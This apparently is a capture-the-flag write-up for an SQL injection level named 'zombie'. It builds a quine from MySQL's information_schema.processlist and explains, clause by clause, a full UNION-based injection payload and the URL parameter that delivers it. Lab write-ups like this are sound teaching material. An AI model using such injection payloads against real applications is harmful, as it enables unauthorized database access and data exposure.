Skip to main content

zombie

1

We are provided with the SQL query:

SELECT pw FROM prob_zombie WHERE pw='{$_GET[pw]}'

Similar to [ouroboros], in this challenge, we have to use a Quine in order to solve it. However, since ace is being filtered out, we have to find another way of crafting our Quine.

 

information_schema.processlist table

As noted by this documentation, in MySQL, the information_schema.processlist is one source of process information which indicates the operations currently being performed by the set of threads executing within the server.

info column

Within this table, the info column contains the statement that is being executed as show below.

3

SELECT info FROM information_schema.processlist

Since the above query is being executed, the value present in the info column of information_schema.processlist would be:

+-------------------------------------------------+
| info                                            |
+-------------------------------------------------+
| SELECT info FROM information_schema.processlist |
+-------------------------------------------------+

As we can see, the SQL query outputs itself, thus acting as a Quine.

 

Modified Quine

1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23
  • substr(info,locate('1',info),length(info)-locate('1',info)):
    • locate('1', info) finds the position of the first occurrence of the character '1' in the info column.
    • length(info) gives the total length of the info column's content.
    • length(info)-locate('1',info) calculates the length of the substring starting from the first occurrence of '1' to the end of the info content.
    • substr(info, locate('1', info), length(info) - locate('1', info)) extracts this substring.
  • from information_schema.processlist:
    • This specifies the table from which the data is being selected. The information_schema.processlist table contains information about the currently running processes in the MySQL database server.

 

If we provide the following URI parameter:

?pw=1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23

The resultant query becomes:

SELECT pw FROM prob_zombie WHERE pw='1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist #'

2